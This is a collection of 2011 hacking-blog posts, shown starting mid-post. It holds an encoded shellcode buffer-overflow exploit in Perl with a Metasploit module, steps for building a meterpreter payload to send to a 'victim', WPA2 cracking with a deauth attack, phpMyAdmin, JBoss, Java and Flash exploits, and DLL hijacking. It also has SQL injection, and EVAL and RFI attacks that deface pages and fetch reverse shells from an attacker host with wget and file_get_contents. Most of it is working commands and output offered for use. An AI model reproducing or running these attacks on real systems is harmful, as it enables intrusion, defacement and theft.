"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .<br />
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48" .<br />
"\x4b\x39\x45\x50\x45\x50\x45\x50\x45\x30\x4d\x59\x5a\x45" .<br />
"\x50\x31\x58\x52\x45\x34\x4c\x4b\x56\x32\x56\x50\x4c\x4b" .<br />
"\x56\x32\x54\x4c\x4c\x4b\x51\x42\x45\x44\x4c\x4b\x54\x32" .<br />
"\x47\x58\x54\x4f\x4e\x57\x50\x4a\x47\x56\x56\x51\x4b\x4f" .<br />
"\x50\x31\x49\x50\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x54\x42" .<br />
"\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d\x45\x51\x49\x57" .<br />
"\x5a\x42\x4c\x30\x50\x52\x50\x57\x4c\x4b\x51\x42\x54\x50" .<br />
"\x4c\x4b\x51\x52\x47\x4c\x45\x51\x58\x50\x4c\x4b\x47\x30" .<br />
"\x54\x38\x4d\x55\x49\x50\x43\x44\x51\x5a\x43\x31\x58\x50" .<br />
"\x50\x50\x4c\x4b\x47\x38\x52\x38\x4c\x4b\x51\x48\x51\x30" .<br />
"\x45\x51\x4e\x33\x5a\x43\x47\x4c\x50\x49\x4c\x4b\x56\x54" .<br />
"\x4c\x4b\x43\x31\x4e\x36\x56\x51\x4b\x4f\x56\x51\x49\x50" .<br />
"\x4e\x4c\x4f\x31\x58\x4f\x54\x4d\x43\x31\x58\x47\x50\x38" .<br />
"\x4d\x30\x54\x35\x4b\x44\x54\x43\x43\x4d\x5a\x58\x47\x4b" .<br />
"\x43\x4d\x47\x54\x52\x55\x4d\x32\x51\x48\x4c\x4b\x56\x38" .<br />
"\x47\x54\x43\x31\x4e\x33\x52\x46\x4c\x4b\x54\x4c\x50\x4b" .<br />
"\x4c\x4b\x56\x38\x45\x4c\x43\x31\x49\x43\x4c\x4b\x45\x54" .<br />
"\x4c\x4b\x45\x51\x58\x50\x4b\x39\x47\x34\x47\x54\x47\x54" .<br />
"\x51\x4b\x51\x4b\x45\x31\x51\x49\x50\x5a\x56\x31\x4b\x4f" .<br />
"\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c\x4b\x45\x42\x5a\x4b" .<br />
"\x4d\x56\x51\x4d\x43\x58\x47\x43\x47\x42\x45\x50\x43\x30" .<br />
"\x52\x48\x54\x37\x43\x43\x47\x42\x51\x4f\x51\x44\x43\x58" .<br />
"\x50\x4c\x43\x47\x56\x46\x54\x47\x4b\x4f\x49\x45\x4e\x58" .<br />
"\x5a\x30\x43\x31\x45\x50\x43\x30\x56\x49\x4f\x34\x51\x44" .<br />
"\x50\x50\x52\x48\x56\x49\x4d\x50\x52\x4b\x45\x50\x4b\x4f" .<br />
"\x4e\x35\x56\x30\x56\x30\x56\x30\x50\x50\x47\x30\x50\x50" .<br />
"\x47\x30\x56\x30\x45\x38\x4b\x5a\x54\x4f\x49\x4f\x4d\x30" .<br />
"\x4b\x4f\x49\x45\x4c\x49\x49\x57\x56\x51\x49\x4b\x50\x53" .<br />
"\x45\x38\x54\x42\x43\x30\x52\x31\x51\x4c\x4c\x49\x4d\x36" .<br />
"\x52\x4a\x54\x50\x56\x36\x50\x57\x45\x38\x4f\x32\x49\x4b" .<br />
"\x47\x47\x43\x57\x4b\x4f\x49\x45\x56\x33\x50\x57\x52\x48" .<br />
"\x4e\x57\x5a\x49\x50\x38\x4b\x4f\x4b\x4f\x49\x45\x56\x33" .<br />
"\x56\x33\x51\x47\x52\x48\x52\x54\x5a\x4c\x47\x4b\x4b\x51" .<br />
"\x4b\x4f\x58\x55\x56\x37\x4d\x59\x58\x47\x43\x58\x54\x35" .<br />
"\x52\x4e\x50\x4d\x45\x31\x4b\x4f\x58\x55\x45\x38\x45\x33" .<br />
"\x52\x4d\x43\x54\x45\x50\x4c\x49\x4b\x53\x56\x37\x50\x57" .<br />
"\x50\x57\x50\x31\x4c\x36\x52\x4a\x45\x42\x56\x39\x50\x56" .<br />
"\x4b\x52\x4b\x4d\x45\x36\x49\x57\x50\x44\x47\x54\x47\x4c" .<br />
"\x43\x31\x45\x51\x4c\x4d\x50\x44\x56\x44\x54\x50\x58\x46" .<br />
"\x45\x50\x50\x44\x51\x44\x50\x50\x51\x46\x50\x56\x51\x46" .<br />
"\x50\x46\x56\x36\x50\x4e\x51\x46\x51\x46\x50\x53\x51\x46" .<br />
"\x45\x38\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x49\x45" .<br />
"\x4c\x49\x4d\x30\x50\x4e\x51\x46\x50\x46\x4b\x4f\x50\x30" .<br />
"\x45\x38\x43\x38\x4b\x37\x45\x4d\x45\x30\x4b\x4f\x49\x45" .<br />
"\x4f\x4b\x4c\x30\x58\x35\x49\x32\x51\x46\x45\x38\x4f\x56" .<br />
"\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x47\x4c\x54\x46" .<br />
"\x43\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b\x50\x54\x35\x43\x35" .<br />
"\x4f\x4b\x47\x37\x45\x43\x54\x32\x52\x4f\x52\x4a\x45\x50" .<br />
"\x51\x43\x4b\x4f\x4e\x35\x41\x41";<br />
<br />
$socket = IO::Socket::INET->new(<br />
Proto => "tcp",<br />
PeerAddr => "$ARGV[0]",<br />
PeerPort => "$ARGV[1]",<br />
);<br />
$socket->recv($serverdata, 1024);<br />
print $serverdata;<br />
$socket->send($header.$junk.$eip.$nop.$shellcode);<br />
<br />
<br />
Save it , give execute permission and run it.<br />
If everything goes according to the plan, you should be able to telnet the server on port 4444 and get your shell after the execution of the exploit, lets try it.<br />
<br />
root@bt:~# ./vulnserv_shell.pl 172.16.1.7 9999<br />
Welcome to Vulnerable Server! Enter HELP for help.<br />
root@bt:~# telnet 172.16.1.7 4444<br />
Trying 172.16.1.7...<br />
Connected to 172.16.1.7.<br />
Escape character is '^]'.<br />
Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.<br />
<br />
C:\temp><br />
<br />
<br />
And we have our shell!!! Great.<br />
Now you can convert your perl exploit to the metasploit format.<br />
Create a file under /pentest/exploits/framework3/modules/exploits/windows/misc/ called <br />
vulnserver.rb with the following content :<br />
<br />
<br />
require 'msf/core'<br />
<br />
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => 'Vuln server',<br />
'Description' => %q{<br />
Angelo test.<br />
},<br />
'Author' => 'Angelo' ,<br />
'Version' => '$Revision: 13646 1$',<br />
'Platform' => 'win',<br />
'Payload' =><br />
{<br />
'BadChars' => "\x00\x0d\x20\xad",<br />
},<br />
'Targets' =><br />
[<br />
[ 'Windows XP SP3',{'Ret'=> 0x625011af,}],<br />
],<br />
'DefaultTarget' => 0,<br />
))<br />
register_options([ Opt::RPORT(9999)],self.class)<br />
<br />
<br />
end<br />
<br />
def exploit<br />
connect<br />
<br />
header = "TRUN /.:/"<br />
junk = make_nops(2003)<br />
eip = [target.ret].pack('V')<br />
nops = make_nops(20)<br />
<br />
sploit = header + junk + eip + nops + payload.encoded<br />
<br />
print_status("Trying #{target.name}...")<br />
<br />
sock.put(sploit)<br />
<br />
handler<br />
disconnect<br />
end<br />
<br />
end<br />
<br />
<br />
<br />
And now lets try to exploit using metasploit<br />
<br />
msf > use windows/misc/vulnserver<br />
msf exploit(vulnserver) > set RHOST 172.16.1.7<br />
RHOST => 172.16.1.7<br />
msf exploit(vulnserver) > set PAYLOAD windows/shell_bind_tcp<br />
PAYLOAD => windows/shell_bind_tcp<br />
msf exploit(vulnserver) > set EXITFUNC seh<br />
EXITFUNC => seh<br />
msf exploit(vulnserver) > exploit<br />
<br />
[*] Started bind handler<br />
[*] Trying Windows XP SP3...<br />
[*] Command shell session 1 opened (172.16.1.79:52672 -> 172.16.1.7:4444) at 2011-09-30 14:09:01 <br />
<br />
+0100<br />
<br />
Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.<br />
<br />
C:\temp><br />
<br />
<br />
And there you go, working with metasploit as well.<br />
<br />
Phewwww, that was a long post, and I hope everyone enjoyed.<br />
<br />
Thank you all.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3012395024337025063.post-77891490047255493032011-09-30T03:09:00.000-07:002012-06-01T02:39:51.788-07:00How to create a binary file with metasploitThis is a how to create a binary file that will be sent to the attacking victim , so first you create the binary file with metasploit , send to the victim and prepare the server to wait for the connection.<br />
<br />
cd /pentest/exploits/framework3<br />
./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=8888 X > /var/www/exploits/reverse_shell_meterpreter.exe<br />
msfconsole<br />
use exploit/multi/handler<br />
set PAYLOAD windows/meterpreter/reverse_tcp<br />
set LHOST 172.16.1.79<br />
set LPORT 8888<br />
exploit<br />
<br />
Now your server is waiting for the client , when he opens the file, you will get your meterpreter session on his computer.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3012395024337025063.post-76866473308840741352011-09-30T03:06:00.000-07:002012-06-01T02:40:08.536-07:00Quick how to crack a wireless networkHello guys, this is a quick how to crack a wireless network.<br />
<br />
1) airmon-ng ( Show interfaces)<br />
2) airmon-ng start wlan0 ( Put in monitoring mode and allow it do do channel hopping)<br />
3) airodump-ng mon0 (This will start a channel hopping and look for all access points)<br />
4) Crtl+c<br />
5) Now choose the one that you want to crack from the list with the command<br />
airodump-ng -c 10 --bssid 00:00:00:00:00:00 mon0 -w /root/wpa2crack<br />
And now it is capturing everything only for that specific channel and wireless device.<br />
6) Now you need to capture the handshake, you have to options, wait for the client reconnect or disconnect the client with a deauth attack and force the client to reconnect, to do that type:<br />
7) aireplay-ng -0 1 -a ( access point) 00:00:00:00:00:00 -c (client that I want to launch my attack agaist) 00:00:00:00:00 mon0<br />
8) If you look at the top right corner, you will see WPA HANDSHAKE , then crtl+c<br />
9) You crack it with : aircrack-ng /root/wpa2crack.cap -w /pentest/passwords/wordlist/dict.txt<br />
10 ) You should see your key, you can also use rainbow tables with john the ripper.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-29035900340965249792011-08-05T02:57:00.000-07:002012-06-01T02:41:16.777-07:00phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities<iframe allowfullscreen="" frameborder="0" height="295" src="http://www.youtube.com/embed/oIEd1T9bcAY?fs=1" width="480"></iframe><br />
<br />
phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities<br />
Bugtraq ID: 48563<br />
Class: Input Validation Error<br />
CVE: CVE-2011-2505<br />
CVE-2011-2506<br />
CVE-2011-2507<br />
CVE-2011-2508<br />
Remote: Yes<br />
Local: No<br />
Published: Jul 05 2011 12:00AM<br />
Updated: Jul 26 2011 10:10PM <br />
URL : http://www.securityfocus.com/bid/48563/info<br />
<br />
Hello all, this post will be a mix with an old post that I already did wish was "Deface using EVAL() function" + phpmyadmin Prior to 3.3.10.2 and 3.4.3.1.<br />
PhpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities.Successful attacks can compromise the affected application and possibly the underlying computer. So, lets test that. We have 2 exploits available.With the first one, we will make the eval option available for us to execute remote commands on the target machine.<br />
<br />
php exploit1.php http://172.16.1.18/phpmyadmin<br />
You should get something like this<br />
[i] Running...<br />
[*] Contacting server to retrive session cookie and token.<br />
[i] Cookie:dkucqrelskbq2k8kd2ouive7rsb9t176<br />
[i] Token:64d4cd9570888c981c127bdf47586d65<br />
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.<br />
[*] Contacting server to make it save the injected code to a file.<br />
[*] Contacting server to test if the injected code executes.<br />
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!<br />
[+] Use your browser to execute PHP code like this <br />
<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=echo%20'test';<br />
<br />
Great, that means it worked.<br />
Now we apply what I explained before about EVAL().<br />
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this in the attacking server:<br />
nc -l -p 8080 -vvv<br />
<br />
Ok, now lets go back to the browser and upload our shell to the server.<br />
<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("ls -la /");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("cat /etc/passwd");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("chmod 777 /tmp/airwolf_reverse_shell");<br />
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("/tmp/airwolf_reverse_shell");<br />
<br />
After you typed this last line, you go to the attacking server shell to see if the target server connected to you.<br />
listening on [any] 8080 ...<br />
172.16.1.18: inverse host lookup failed: Unknown server error : Connection timed out<br />
connect to [172.16.1.79] from (UNKNOWN) [172.16.1.18] 53365<br />
<br />
<br />
ls<br />
config.inc.php<br />
id<br />
uid=48(apache) gid=48(apache) groups=48(apache)<br />
<br />
Yeap, as you can see got our shell in the server. <br />
Have fun ;)Unknownnoreply@blogger.com7tag:blogger.com,1999:blog-3012395024337025063.post-40959618972455865992011-04-30T08:31:00.002-07:002012-06-01T02:41:34.924-07:00JAVA CVE-2010-4452<iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/znZHSfuVSb0" width="425"></iframe><br />
<br />
<br />
CVE: CVE-2010-4452<br />
Remote: Yes<br />
Local: No<br />
Published: Feb 15 2011 12:00AM<br />
Updated: Apr 19 2011 08:45PM <br />
Description: Oracle Java is prone to a remote code-execution vulnerability in Java Runtime Environment.An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.This vulnerability affects the following supported versions:6 Update 23 and lower.<br />
To exploit you can use the folloing systax on metasploit:<br />
use windows/browser/java_codebase_trust<br />
set SRVHOST 192.168.1.69<br />
set SRVPORT 80<br />
set URIPATH /<br />
set PAYLOAD java/meterpreter/reverse_tcp<br />
set LHOST 192.168.1.69<br />
set LPORT 8888<br />
exploit<br />
Then open up the client browser and open the URL <a href="http://192.168.1.69/">http://192.168.1.69/</a><br />
You should get your shell!<br />
I tested on windows XP and Windows 7, both worked fine, but it didn't worked on ubuntu.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3012395024337025063.post-39272575530188044492011-04-30T08:31:00.000-07:002011-04-30T08:31:16.195-07:00Adobe Flash Player CVE-2011-0611 'SWF' File Remote Memory Corruption VulnerabilityCVE-2011-0611<br />
Remote: Yes<br />
Local: No<br />
Published: Apr 11 2011 12:00AM<br />
Updated: Apr 21 2011 04:14PM <br />
Hello everyone, its beeing a while since my last post, sorry for the delay on the posts but lately I am really busy, but I will try to keep it up. Today I will do 3 posts, the first one is for Adobe Flash and the other is for webdav and the last for java!<br />
So, this adobe exploit is just another one on the wild.. there is so many, I have desided to put the latest one. No big fuss,just prepare the server on metasploit and open the link on the client, so lets do this:<br />
1) msfconsole and then type this ( adjust to your ip address)<br />
use windows/browser/adobe_flashplayer_flash10o<br />
set PAYLOAD windows/meterpreter/reverse_tcp<br />
set LHOST 192.168.1.69<br />
set LPORT 8888<br />
set SRVHOST 192.168.1.69<br />
set SRVPORT 80<br />
set URIPATH /<br />
exploit<br />
[*] Exploit running as background job.<br />
[*] Started reverse handler on 192.168.1.69:8888<br />
[*] Using URL: 192.168.1.69:80<br />
[*] Server started.<br />
Now, open this URL in the client and you will get your shell.<br />
sessions -i 1<br />
Bear in mind that this link can be hidden inside a div or a frame, so you can open a malisious link even if you don't click on anything.<br />
And that's it ;)Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-42765021865001390552011-04-30T08:30:00.000-07:002012-06-01T02:42:14.058-07:00DLL HijackingThis vulnerability is triggered when a vulnerable file type is opened from the server that is hosting the files. <br />
Ususally , the user has to browse into the directory and open the file, this can be any file, even blank one with nothing inside.<br />
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory , and then we got our<br />
shell. So lets do this one.<br />
<br />
1) open msfconsole<br />
msf> search webdav.dll<br />
msf> use windows/browser/webdav_dll_hijacker<br />
msf> set PAYLOAD windows/meterpreter/reverse_tcp<br />
msf> set BASENAME reports<br />
msf> set extensions grp <br />
msf> set LHOST 192.168.1.69<br />
msf> set SRVHOST 192.168.1.69<br />
msf> set LPORT 8888<br />
msf> set SRVPORT 80<br />
msf> set SHARENAME documents<br />
msf> exploit<br />
Now , go to the client and browse this directory <a href="file:///">file://192.1681.1.69/</a> and click on any file<br />
Done, you have your shell<br />
msf> sessions<br />
<br />
Now, go to this website to see the list of all apps that are vulnerable <br />
<a href="http://vupen.com/english/searchengine.php?keyword=insecure+library+loading">http://vupen.com/english/searchengine.php?keyword=insecure+library+loading</a>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-7027299303535840572011-03-12T13:43:00.000-08:002012-06-01T02:43:51.707-07:00How to do sql injections with SQLMAPHi everyone, today I will explain how to use a tool called sqlmap, this tool make your life easier , instead guessing the correct url to get the information that you need from the server with weird and complex combinations. There is a website that acunetix made available for sql tests : http://testphp.vulnweb.com/<br />
<br />
So, I know that there is a problem in this URL http://testphp.vulnweb.com/listproducts.php?cat=1 because if you type http://testphp.vulnweb.com/listproducts.php?cat=' , you get a msql error : <br />
<br />
<b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php on line 74</b><br />
<br />
Now if you want to know how many fields this table has, you have to type this<br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1-- <br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2-- <br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3-- <br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 4-- <br />
and so on until you get another error, in this case, is 11, so you know that there is 11 fields on this table because if you put order by 12 you get an error.<br />
Ok, now if want to know the user that is running this database I would type : <br />
<a href="http://testphp.vulnweb.com/listproducts.php?cat=1">http://testphp.vulnweb.com/listproducts.php?cat=1</a> UNION SELECT ALL 1,USER(),3,4,5,6,7,8,9,10,11--<br />
Or the database name..<br />
<a href="http://testphp.vulnweb.com/listproducts.php?cat=1">http://testphp.vulnweb.com/listproducts.php?cat=1</a> UNION SELECT ALL 1,DATABASE(),3,4,5,6,7,8,9,10,11--<br />
Check the botton of the page for the results.<br />
<br />
<br />
Pretty boring and time consuming heim? Lets make this easier with sqlmap.<br />
You can download sqlmap or use the one that is in backtrack : root@bt:/pentest/database/sqlmap/<br />
Open the sqlmap.conf and put the vuln url in the url field, it should look like this :<br />
url = http://testphp.vulnweb.com/listproducts.php?cat=1<br />
save it and now lets run some tests.<br />
<br />
1) sqlmap -h ( look all the different things you can do)<br />
2) lets open a sql shell on the remote server with this command : ./sqlmap.py -c sqlmap.conf --sql-shell<br />
Now you are on a shell, you can type any sql query, here are some examples in my sql shell:<br />
<br />
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)<br />
web application technology: Apache 2.0.55, PHP 5.1.2<br />
back-end DBMS: MySQL 5<br />
[21:28:02] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER<br />
sql-shell> version()<br />
do you want to retrieve the SQL statement output? [Y/n] y<br />
[21:28:55] [INFO] fetching SQL query output: 'version()'<br />
[21:28:55] [INFO] retrieved: 5.0.22-Debian_0ubuntu6.06.6-log<br />
version(): '5.0.22-Debian_0ubuntu6.06.6-log'<br />
<br />
sql-shell> user()<br />
do you want to retrieve the SQL statement output? [Y/n] y<br />
[21:29:39] [INFO] fetching SQL query output: 'user()'<br />
[21:29:39] [INFO] retrieved: acuart@localhost<br />
user(): 'acuart@localhost'<br />
<br />
################<br />
Now lets lists all databases and tables with the command : ./sqlmap.py -c sqlmap.conf --tables<br />
And this is the result :<br />
Database: acuart<br />
[7 tables]<br />
+---------------------------------------+<br />
| aaars |<br />
| aaastbes |<br />
| aaastbook |<br />
| aaatured |<br />
| aarts |<br />
| aateg |<br />
| artists |<br />
+---------------------------------------+<br />
<br />
Database: modrewriteShop<br />
[1 table]<br />
+---------------------------------------+<br />
| products |<br />
+---------------------------------------+<br />
<br />
Database: information_schema<br />
[16 tables]<br />
+---------------------------------------+<br />
| CABGG |<br />
| CABGGERIVILEGES |<br />
| CABGGERS |<br />
| CABLES |<br />
| CABLE_CONSTRAINTS |<br />
| CABLE_PRIVILEGES |<br />
| CCATISTICS |<br />
| CCHEMATA |<br />
| CCHEMA_PRIVILEGES |<br />
| CEUTINES |<br />
| CEY_COLUMN_USAGE |<br />
| CHARACTER_SETS |<br />
| COLLATIONS |<br />
| COLLATION_CHARACTER_SET_APPLICABILITY |<br />
| COLUMNS |<br />
| COLUMN_PRIVILEGES |<br />
+---------------------------------------+<br />
<br />
<br />
Pretty easy don't you think? Well, this is just and introduction on what you can do this sqlmap, have fun!!Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-88357117657434963862011-03-12T12:11:00.000-08:002012-06-01T02:44:58.217-07:00Proof of concept on jboss exploit (CVE-2010-0738)<iframe allowfullscreen="" frameborder="0" height="510" src="http://www.youtube.com/embed/pErDcezjaLo" title="YouTube video player" width="640"></iframe><br />
<br />
CVE: CVE-2010-0738<br />
Remote: Yes<br />
Local: No<br />
Url about the vuln and download of the exploit : <a href="http://www.securityfocus.com/bid/39710/info">http://www.securityfocus.com/bid/39710/info</a><br />
<br />
<br />
JBoss Enterprise Application Platform is prone to multiple vulnerabilities, including an information-disclosure issue and multiple authentication-bypass issues. An attacker can exploit these issues to bypass certain security restrictions to obtain sensitive information or gain unauthorized access to the application.<br />
Ok, now lets rock and roll!<br />
1) Open 2 shell's on your backtrack or your pentest machine<br />
2) In the first one you have to prepare your pentest server to receive the connection back from the target machine, so you have to type in this shell : nc -l -p 8000 -vvv<br />
3) Now, in the other shell run the exploit : perl jboss.pl mytargettest.com 8080 172.16.1.79 8000 lnx<br />
<br />
If you see this in the exploit shell, it means it worked!<br />
<br />
UPLOAD... SUCCESS<br />
EXECUTE<br />
SUCCESS<br />
<br />
<div>
<br />
Now go to your other shell and you should have your reverse shell connected!</div>
<div>
<br /></div>
<div>
Have fun.</div>
<div>
<br /></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3012395024337025063.post-682650937076016962011-03-05T13:17:00.000-08:002012-06-01T02:45:37.230-07:00Deface using EVAL() function<iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/RLif-Nl05fQ" title="YouTube video player" width="480"></iframe><br />
<br />
"Eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.<br />
The problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such. Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result."<br />
<br />
Ok, this is our the vuln page :<br />
<br />
<?php<br />
$Ev = $_GET['ev'];<br />
$eva = stripslashes($Ev);<br />
eval($eva);<br />
?><br />
Now lets go to the interesting part, to start we need to test if the page is vuln typing this :<br />
<a href="http://mytargettest.com/hacktest/index.php?ev=phpinfo">http://mytargettest.com/hacktest/index.php?ev=phpinfo</a>();<br />
If you can see the phpinfo webpage, it means we can exploit it.<br />
Now lets see what we can do .<br />
1) You can just deface the index.php using this URL -> <a href="http://mytargettest.com/hacktest/index.php?ev=$z=fopen%28%22index.php%22,%27w%27%29;fwrite%28$z,%28%22Defaced">http://mytargettest.com/hacktest/index.php?ev=$z=fopen("index.php",'w');fwrite($z,("Defaced</a> by Hacker"));fclose($z);<br />
<br />
2) Or you can create your shell with this URL -> <a href="http://mytargettest.com/hacktest/index.php?ev=$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://172.16.1.79/exploits/back.txt%22%29%29;fclose%28$z">http://mytargettest.com/hacktest/index.php?ev=$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://172.16.1.79/exploits/back.txt"));fclose($z</a>);<br />
<br />
3) Browse your shell : <a href="http://mytargetest.com/hacktest/shell.php">http://mytargetest.com/hacktest/shell.php</a><br />
Now just look at my old posts (LFI or RFI) and you will know what to do from this point ;)Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-3012395024337025063.post-3953395423209354702011-03-05T13:11:00.000-08:002012-06-01T02:46:49.935-07:00How to exploit RFI (Remote File Include) vulnerability on webpages.<iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/bCy_5smSRys" title="YouTube video player" width="480"></iframe><br />
<br />
Hi everyone, this post is really similar to the one that I just made ( LFI ), the only difference is that you can include your own code into the remote server more easily.<br />
So, this is our vuln wepage :<br />
http://mytargettest.com/hacktest/rfi.php?COLOR=color.css<br />
BUT instead loading the file color.css, we will be loading our own code to that box like this :<br />
<br />
http://mytargettest.com/hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt<br />
<br />
The content of evil3.txt is :<br />
<br />
<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?><br />
<br />
If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code.<br />
Great, we just uploaded our shell to the server now browse it : http://mytargettest.com/hacktest/shell.php<br />
Now you can just repeat what I did in the LFI post to get your real shell in the server.<br />
<br />
Another Tip: Some developers try to include the extension like .css or .php or .any other extension, ok, so how can we avoid that? You just add a NULLBYTE in the end of the URL.Unknownnoreply@blogger.com7